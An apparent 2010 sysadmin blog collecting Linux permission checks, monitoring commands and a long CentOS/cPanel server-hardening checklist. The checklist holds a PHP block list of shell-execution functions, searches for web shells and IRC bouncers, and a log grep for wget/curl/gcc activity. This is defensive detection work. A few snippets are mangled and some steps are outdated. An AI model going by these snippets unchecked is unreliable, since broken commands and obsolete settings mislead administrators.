الأربعاء، 26 مايو 2010

Linux File And Directory Permissio

Never make files world-writable, search for world-writable files in the current directory. 
find . -perm -2 -print
Find directory with 777 permission. 
find . -type d -perm 777
search for suid and sgid files. 
find / -type f -perm +6000 -ls
search the /dev directory for world writable files. 
find /dev -perm -2 -print
To find all files for particular user 
find / -user nobody  -ls  (where nobody is the username)
To locate all world-writable files on your system, use the following command: 
root# find / -perm -2 ! -type l -ls
In the normal course of operation, several files will be world-writable, including some from /dev, and symbolic links, thus the "! -type l" which excludes these from the previous find command.
SUID commands
The SUID mechanism allow ordinary users to temporarily access some files with the rights of file's owner.
For example it is possible (by passwd command) to change his password, writing in /etc/passwd which is owned by root, because /bin/passwd is executable by anybody but SUID for root ; when executing passwd the real user id (user who runs the command) is different from the effective user id (root) necessary to write in /etc/passwd
SUID is indicated by a 's' in place of 'x' for the owner-execute permission : -rwsr-xr-x
in octal notation a SUID program is indicated by 04???
SGID is similar for the group permissions : 02???
Setting permission correctly.
You can use these commands to set 755 on directories and 644 on files 
find -type f -exec chmod 644 {} \;
      find -type d -exec chmod 755 {} \;
مرسلة بواسطة في ليست هناك تعليقات:

Linux Commands New

Linux Commands
Backup to tape drive /dev/st0
Following command to backup the /webroot directory and its content to /dev/st0 with 256 blocking factor: 
# tar cvf -b 256 /dev/st0 /webroot
-b, --blocking-factor N 
use record size of Nx512 bytes (default N=20)
Using cdrecord
  1. cdrecord -scanbus
  2. cdrecord -v speed=2 dev=0,0,0 -data cdimage.iso (The CD writer is the device labeled '0,0,0')
Making ISO images
mkisofs -r -o output_cd_image data_on_HDD (then use cdrecord to write output_cd_image to a CD)
Finding out the disk usage for a partition or dir du - estimate file space usage 
du -hm --max-depth 1
How to Monitor the services that is using up most of the cpu and memory on a server. 
ps auxfw|sort -nr|grep -v 0.0


  [root@wordsworth ~]# ps auxfw|sort -nr|grep -v 0.0
  USER       PID MEM   VSZ  RSS TTY      STAT START   TIME COMMAND
  linux      613  0.4  3.2 21844 15896 ?       S    15:01   0:10 wish /usr/bin/amsn
  linux     4085  0.1  1.7 28384 8240 ?        S    Mar01  13:45 /usr/libexec/wnck-applet --oaf-
  linux    32728  1.8  7.5 67216 36196 ?       S    14:54   0:50 /usr/lib/opera/9.10-20061214.5/
  linux    31458  0.1  1.0 48068 5088 ?        Sl   12:26   0:15 xmms -e
  linux    30276  0.6  4.4 79656 21488 ?       Sl   07:55   3:09 skype
  linux    30261  3.0 18.8 221380 90792 ?      Sl   07:54  14:15      \_ /home/linux/firefox/firefox-
  linux    30099  0.1  4.5 123240 21776 ?      Sl   07:25   0:54      \_ /usr/lib/
  linux     2285  0.1  2.6 35504 12560 ?       S    Mar06   3:06 gaim

   root@server16 [~]# ps auxfw|grep -vE '0.0|0.1'
Linux Server Monitoring Commands- How do i monitor a Linux Server
How verify integrity of password files
We can use the command below to verify the integrity of the password file.
shibu@shibu-laptop:~$ apropos pwck
pwck (8)- verify integrity of password files 
shibu@shibu-laptop:~$ sudo pwck /etc/passwd
[sudo] password for shibu:
user lp: directory /var/spool/lpd does not exist
user news: directory /var/spool/news does not exist
user uucp: directory /var/spool/uucp does not exist
user www-data: directory /var/www does not exist
user list: directory /var/list does not exist
user irc: directory /var/run/ircd does not exist
user gnats: directory /var/lib/gnats does not exist
user nobody: directory /nonexistent does not exist
user dhcp: directory /nonexistent does not exist
user syslog: directory /home/syslog does not exist
user klog: directory /home/klog does not exist
user hplip: directory /var/run/hplip does not exist
user haldaemon: directory /home/haldaemon does not exist
pwck: no changes
shibu@shibu-laptop:~$
How to verify the integrity of the group file
shibu@shibu-laptop:~$ apropos grpck
grpck (8)- verify integrity of group files
How to check information regarding LVM
  • resize2fs (8) - ext2/ext3 file system resizer: resize2fs /dev/mynew_vg/vol01
  • pvcreate (8) - initialize a disk or partition for use by LVM : pvcreate /dev/sdb1
  • pvdisplay (8) - display attributes of a physical volume: pvdisplay
  • vgcreate (8) - create a volume group: vgcreate mynew_vg /dev/sdb1 , vgcreate mynew_vg /dev/sdb1 /dev/sdb2
  • vgextend (8) - add physical volumes to a volume group : vgextend mynew_vg /dev/sdb2
  • lvcreate (8) - create a logical volume in an existing volume group:
  • vgdisplay (8) - display attributes of volume groups
  • create a logical volume of size 400 MB -L 400 : lvcreate -L 400 -n vol01 mynew_vg
  • create a logical volume of size 4 GB -L 4G : lvcreate -L 4000 -n vol02 mynew_vg
  • mke2fs (8) - create an ext2/ext3 filesystem
  • mke2fs [mkfs] (8) - create an ext2/ext3 filesystem
  • mke2fs - create an ext2/ext3 filesystem : mkfs.ext3 /dev/mynew_vg/vol01
How to find processor related stats
mpstat 
[linux@wordsworth ~]$ man -k mpstat
  mpstat               (1)  - Report processors related statistics
  snmpstatus           (1)  - Retrieves important information from a network entity
  [linux@wordsworth ~]$

  [linux@wordsworth ~]$ mpstat 5
  Linux 2.6.9-55.0.2.ELsmp (wordsworth.armialocal.com)    08/12/2007

  09:59:51 PM  CPU   nice iowait    soft   %idle    intr/s
  09:59:56 PM  all   18.70    0.10   42.50    0.00    0.10    0.00   38.60   1290.60
  10:00:01 PM  all   15.30    0.00   41.80    0.00    0.10    0.00   42.80   1276.00
  10:00:06 PM  all   19.98    0.00   42.36    0.20    0.00    0.00   37.46   1273.35
vmstat 
[linux@wordsworth ~]$ man -k vmstat
   vmstat               (8)  - Report virtual memory statistics
   linux@wordsworth ~]$

   [linux@wordsworth ~]$ vmstat 2
   procs -----------memory---------- ---swap-- -----io---- --system-- ----cpu----
    r  b   swpd   free   buff  cache   si   so    bi    bo   in    cs us sy id wa
    2  0 355084  20888  10736  84396    1    1    37    29   11    13 10 22 67  1
    1  0 355084  20936  10736  84396    0    0     0     0 1284  1191 10 42 48  0
    3  0 355084  19848  10736  84396    0    0     0     0 1246  1123  9 44 47  0
How do i display info regarding all TCP/IP sockets in operation currently 
Use the command netstat

       netstat -a
       usage: netstat [-veenNcCF] [] -r         netstat {-V|--version|-h|--help}
       netstat [-vnNcaeol] [ ...]
       netstat { [-veenNac] -i | [-cnNe] -M | -s }

        -r, --route              display routing table
        -i, --interfaces         display interface table
        -g, --groups             display multicast group memberships
        -s, --statistics         display networking statistics (like SNMP)
        -M, --masquerade         display masqueraded connections

        -v, --verbose            be verbose
        -n, --numeric            don't resolve names
        --numeric-hosts          don't resolve host names
        --numeric-ports          don't resolve port names
        --numeric-users          don't resolve user names
        -N, --symbolic           resolve hardware names
        -e, --extend             display other/more information
        -p, --programs           display PID/Program name for sockets
        -c, --continuous         continuous listing

        -l, --listening          display listening server sockets
        -a, --all, --listening   display all sockets (default: connected)
        -o, --timers             display timers
        -F, --fib                display Forwarding Information Base (default)
        -C, --cache              display routing cache instead of FIB
مرسلة بواسطة في ليست هناك تعليقات:

How to Secure a Linux Server Centos

How to Secure a Linux Server.
1. Kernel recompile with GR security
2. firewall = CSF
3. Stop unnecessary processes
4. Install Logcheck
5. Install Logwatch 
Optimizing host.conf and sysctl.conf
   http://www.eth0.us/node/104
To modify LogWatch, SSH into server and login as root. At command prompt type: pico -w /etc/log.d/conf/logwatch.conf
Scroll down to
MailTo = root
and change to
Mailto = your@email.com
Note: Set the e-mail address to an offsite account incase you get hacked.
Now scroll down to
Detail = Low
Change that to Medium, or High...
Detail = 5 or Detail = 10
Note: High will give you more detailed logs with all actions. Save and exit.
6. If cpanel server then WHM configuration check
7. OpenSSH configuration check
8. Switch from proftpd to pure-ftpd
9. Rootkit Hunter
rkhunter:
1. Login to your server via SSH as root. Then Type: cd /usr/local/src/
2. Download RKHunter Version 1.1.4
Type: wget http://downloads.rootkit.nl/rkhunter-1.1.4.tar.gz
3. Extract files
Type: tar -xzvf rkhunter-1.1.4.tar.gz
4. Type: cd rkhunter
5. Type: ./installer.sh
6. Lets setup RKHunter to e-mail you you daily scan reports.
Type: pico -w /etc/cron.daily/rkhunter.sh
Add The Following:
  1. !/bin/bash
(/usr/local/bin/rkhunter -c --cronjob 2>&1 | mail -s "RKhunter Scan Details" replace-this@with-your-email.com)
Replace the e-mail above with your e-mail!!
It is best to send the e-mail to an e-mail off-site so that
if the box IS compromised the hacker can't erase the scan report unless he hacks another server too.
Type: chmod +x /etc/cron.daily/rkhunter.sh
10. Chkrootkit
Installing chkrootkit 
[root@server ~]# wget >>ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz
   [root@server ~]# tar xvfz chkrootkit.tar.gz
   [root@server ~]# ./chkrootkit*/chkrootkit
11. mod_security
12. mod_evasive
13. Host spoof protection
14. Operating System check
15. Name server configuration check
16. Disk check
17. Kernel check
18. Apache tune and check
19. MySQL tune and check
20. Enhanced log rotation
21. Day of the week backup rotations
22. Secure /tmp /var/tmp /dev/shm
23. Libsafe for 2.4 kernels
24. Exploit check
25. Delete unnecessary OS users
26. Disable open DNS recursion
27. Enhanced path protection
28. Remove SUID/GUID from binaries
29. PHP hardening
30. phpsuexec
31. Disable vulnerable phpBB installs
32. Initial cPanel configuration
33. Check iptables is configured
34. Check incoming MySQL port
35. Check /etc/cron.daily/logrotate
36. Check /etc/resolv.conf for localhost entry
37. Check /etc/named.conf for recursion restrictions
38. Check server runlevel
39. Check nobody cron
40. Check Operating System support
41. Check SSHv1 is disabled
42. Check SSH on non-standard port
43. Check SSH PasswordAuthentication
44. Check telnet port 23 is not in use
45. Check shell limits
46. Check Background Process Killer
47. Check root forwarder
48. Check exim for extended logging
49. Check php for enable_dl = enable_dl = Off
50. Check php for disable_functions=
disable_functions = show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open, allow_url_fopen
51. Check php for register_globals register_globals = Off
52. Check php open_basedir protection
53. Check phpsuexec
54. Check cPanel login is SSL only
55. Check boxtrapper is disabled
56. Check max emails per hour is set
57. Check whether users can reset passwords via email
58. Check whether native cPanel SSL is enabled
59. Check compilers
60. Check Anonymous FTP access
61. Check allow remote domains
62. Check block common domains
63. Check allow park domains
64. Check package updates
65. Check security updates
66. Check melange chat server
67. service cups stop; chkconfig cups off
68. service xfs stop; chkconfig xfs off
69. service atd stop; chkconfig atd off
70. service nfslock stop; chkconfig nfslock off
71. service canna stop; chkconfig canna off
72. service FreeWnn stop; chkconfig FreeWnn off
73. service cups-config-daemon stop; chkconfig cups-config-daemon off
74. service iiim stop; chkconfig iiim off
75. service mDNSResponder stop; chkconfig mDNSResponder off
76. service nifd stop; chkconfig nifd off
77. service rpcidmapd stop; chkconfig rpcidmapd off
78. service bluetooth stop; chkconfig bluetooth off
79. service anacron stop; chkconfig anacron off
80. service gpm stop; chkconfig gpm off
81. service saslauthd stop; chkconfig saslauthd off
82. service avahi-daemon stop; chkconfig avahi-daemon off
83. service avahi-dnsconfd stop; chkconfig avahi-dnsconfd off
84. service hidd stop; chkconfig hidd off
85. service pcscd stop; chkconfig pcscd off
86. service sbadm stop; chkconfig sbadm off
87. service webmin stop; chkconfig webmin off
88. Add Load Alert Scripts with 1 min cron 
#!/bin/bash
   #uptime alerti script ..
   UP=`uptime|awk '{print $(NF-2)}'|cut -d. -f1`
   if test $UP -gt 4
   then
   `uptime| mail -s "**SERVER LOAD is $UP" mailadd@mail.com`
   fi
89. ignore ping :
  1. iptables -A INPUT -p icmp -j DROP
echo 1>/proc/sys/net/ipv4/icmp_echo_ignore_all
vi /etc/sysctl.conf
Append following line:
net.ipv4.icmp_echo_ignore_all = 1
90. Find directory with 777 permission. 
find . -type d -perm 777
91.Check for open ports using nmap command.
92. Disable identification output for Apache
To disable the version output for proftp, SSH into server and login as root.
At command prompt type: pico /etc/httpd/conf/httpd.conf
Scroll (way) down and change the following line to
ServerSignature Off
Restart Apache
At command prompt type: /etc/rc.d/init.d/httpd restart
93.Change ssh ListenAddress /etc/ssh/sshd_config
94.PermitRootLogin no
95.Add root login alert
vi .bash_profile 
echo 'ALERT - Root Shell Access on:' `date` `who`
   | mail -s "Alert: Root Access from `who | awk '{print $6}'`" your@email.com
96.Set an SSH Legal Message in /etc/motd
97.Locate. 
locate shell.php
   locate irc
   locate eggdrop
   locate bnc
   locate BNC
   locate ptlink
   locate BitchX
   locate guardservices
   locate psyBNC
   locate .rhosts
98.Perform some udp and tcp scan here :
http://www.hackerwatch.org/probe/
This site is not bad too : https://grc.com/x/ne.dll?bh0bkyd2
99.Check /var/log/secure , /var/log/messages and other log files of services running to see if there are any issues.
100.Check your box to see if your performance has degraded or if your machine is being over used.
For that, use the commands
vmstat 
Displays information about memory, cpu and disk.
    Ex: bash# vmstat 1 4 (where 1 is delay and 4 is count)
mpstat 
Displays statistics about cpu utilization. This will help us to see if your cpu is over worked or not.
    Ex: bash# mpstat 1 4 (where 1 is delay and 4 is count)
iostat 
This command displays statistics about the disk system.
    Useful options:
    -d - Gives the device utilization report.
    -k - Display statistics in kilobytes per second.
    Ex: bash# iostat -dk 1 4 (where 1 is delay and 4 is count)
sar 
Displays overall system performance.
Check to see if your server has any hidden processes running.
ps 
Displays the status of all known processes.
lsof
101. List all open files. In Linux everything is considered a file, so you will be able to see almost all of the activity on your system with this command. 
chmod -R 700 /etc/rc.d/init.d/*
    Use rpm -Va to find out if an rpm is modified
    * Apply security patches to vulnerable software (ie. patch -p1 < patch file)
    * Remove all unneeded ttys and console logins by removing the entry from /etc/securetty
    * Check system logs (eg: /var/log/messages, /var/log/secure, etc.)
    * Set a password on the boot loader (lilo and grub both support this)
    * Monitor the system (nagios or big brother)
102. Install AIDE (Advanced Intrusion Detection Environment) is a free
replacement for Tripwire. = http://www.cs.tut.fi/~rammer/aide.html
103. Testing phase when in production.
Use tools like nessus, nikto, and nmap to do a penetration test and see how well your server is secured. Also do a stress test.
find /usr/local/apache/domlogs -exec egrep -iH '(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch)' {} \;
Reference
مرسلة بواسطة في ليست هناك تعليقات:
الاشتراك في: الرسائل (Atom)